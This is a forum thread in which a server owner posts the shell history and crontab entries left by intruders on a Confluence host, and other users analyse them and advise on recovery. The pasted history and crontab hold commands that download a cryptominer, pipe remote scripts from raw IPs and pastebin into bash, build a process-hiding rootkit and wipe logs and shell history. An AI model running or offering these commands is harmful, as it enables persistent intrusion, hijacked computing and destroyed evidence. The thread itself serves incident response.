1 export TERM=xterm 2 top 3 /usr/lib/sys/rcu_bj 4 cd /usr/lib/sys/ 5 ls 6 chmod +x rcu_bj 7 ./rcu_bj 8 chattr -ia rcu_bj 9 ./rcu_bj 10 cd / 11 mkdir .a 12 cd .a 13 git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit.git 14 cd hiding-cryptominers-linux-rootkit/ 15 ls 16 make 17 dmesg 18 dmesg -C 19 ls 20 make 21 ls 22 make 23 make 24 cd .. 25 rm -rf hiding-cryptominers-linux-rootkit/ 26 curl -LO http://1.234.16.54:7070/apiapi/api/raw/master/s.zip;mv s.zip rcu;chmod +x rcu 27 ./rcu 28 top 29 rm -rf /var/log/* 30 cat /dev/null > ~/.bash_history 31 id 32 curl http://123.30.179.206:8189/solr/.v7/api | bash 33 ps auxw --sort=%cpu|tail -10 34 lscpu 35 ps auxw --sort=%cpu|tail -10 36 ps auxw --sort=%cpu|tail -10 37 ps auxw --sort=%cpu|tail -10 38 ps aux | grep rcu 39 python -c 'import pty; pty.spawn("/bin/bash")'
https://github.com/alfonmga/hiding-cryptominers-linux-rootkit
[root@localhost profile.d]# cd /usr/lib/sys [root@localhost sys]# ll 总用量 8 -rwxr-x--x 1 root confluence 0 12 月 1 18:38 rcu_bj -rwxr-x--- 1 root confluence 2786 11 月 14 11:01 rcu_libk -rwxrwx--- 1 root root 1199 11 月 14 11:01 rcu_udev -rwxr-x--- 1 root confluence 0 11 月 14 18:02 systemd [root@localhost sys]# lsattr rcu_bj ---------------- rcu_bj 您在 /var/spool/mail/root 中有邮件 [root@localhost sys]# lsattr rcu_libk ---------------- rcu_libk [root@localhost sys]# lsattr rcu_undev lsattr: 没有那个文件或目录 当尝试对 rcu_undev 进行 stat 调用时 [root@localhost sys]# lsattr rcu_udev ---------------- rcu_udev
[root@localhost sys]# ps -ef|grep rcu root 8 2 0 4 月 13 ? 00:00:06 [rcu_bh] root 9 2 0 4 月 13 ? 22:01:59 [rcu_sched] root 168224 243031 0 16:28 pts/24 00:00:00 grep --color=auto rcu
[root@localhost sys]# alias alias cp='cp -i' alias egrep='egrep --color=auto' alias fgrep='fgrep --color=auto' alias grep='grep --color=auto' alias l.='ls -d .* --color=auto' alias ll='ls -l --color=auto' alias ls='ls --color=auto' alias mv='mv -i' alias rm='rm -i' alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde' [root@localhost sys]# crontab -l
隐藏了什么东西-_-
[root@localhost home]# crontab -u confluence -l */3 * * * * (curl -fsSL https://pastebin.com/raw/NfCRw0LF||wget -q -O- https://pastebin.com/raw/NfCRw0LF|| bash -sh * * * * * curl -fsSL http://j0llychic.com/mkdir_trace2.sh | bash > /dev/null 2>&1 */30 * * * * confluence /var/tmp/.crontab/crontab
这个用户发现了几个定时任务
![]() | 1 dier 2022-12-02 17:46:15 +08:00 检查一下 alias 有没有配置陌生的别名 试试修改这个文件的权限 检查一下 crontab 尝试编辑随便编辑文件内容或修改文件名 看能不能阻止自动启动 |
![]() | 2 quadrapop OP @dier alias 和调度器都看起来正常。 脚本中的 http://1.234.16.54:7070/apiapi/api/raw/master/s.zip 我下下来有差不多 6M ,但是文件是损坏的 |
![]() | 3 Nitroethane 2022-12-02 19:40:04 +08:00 首先不确定你给出的 bash 历史记录是否是完整的,因为 "/usr/lib/sys/rcu_bj" 这个文件像是攻击者植入的,默认系统没有这个文件。 从 GitHub 克隆的这个项目的用途是使用内核模块隐藏挖矿木马的进程信息和 CPU 使用率。 从 1.234.16.54 这个网站下载的 s.zip 不是压缩文件,是一个 ELF ,把 sha256 扔到 virustotal 上发现它是一个挖矿木马。 至于请求 123.30.179.206 这个 URL ,我手动访问了下,返回是 404 ,看命令的话,正常情况应该是一个 shell 脚本,猜测可能是做横向移动用的。 首先你得确认攻击者是从什么入口进来的,通过对公网开放的端口大致可以确定。然后搞清楚攻击者通过这个入口进来后拿到的是什么权限,如果是 root 的话可以考虑备份重要数据然后重装了。不过还是得确定从什么入口进来,要把相应的漏洞修复,否则以后还会中招。 |
![]() | 4 Nitroethane 2022-12-02 19:42:26 +08:00 至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。 |
![]() | 5 cxh116 2022-12-02 19:51:07 +08:00 这种情况应该第一时间关机. 再 u 盘启动,备份数据.防止重要数据被删除或加密了.到时怕交 BTC 也拿不回. 之后再 chroot 修,或直接重装,再把数据拷进去. |
![]() | 6 quadrapop OP @Nitroethane 操作记录只有这么多了,这一段脚本中应该是把日志删除了 这个 rootkit 可以隐藏进程和 cpu 使用率,我搜了下,没找到怎么把隐藏的给显示出来。 现在也不太确定时候从哪个端口进来的,外网几个映射端口已经关掉了-_- 就是这 2 个进程也不知道应该怎么办。 |
![]() | 7 Nitroethane 2022-12-05 16:00:09 +08:00 @quadrapop 注意看我的回复:至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。 通过 /usr/lib/sys 目录下那两个挖矿木马的文件属性判断,应该是通过 confluence 的漏洞进来的。前段时间 confluence 爆出过好几个高危漏洞,赶紧升级下吧。 |
![]() | 8 Nitroethane 2022-12-05 16:02:26 +08:00 你贴出来的这些权限维持操作不是同一个人做的,这台服务器应该是像公交车一样,被很多人上了 |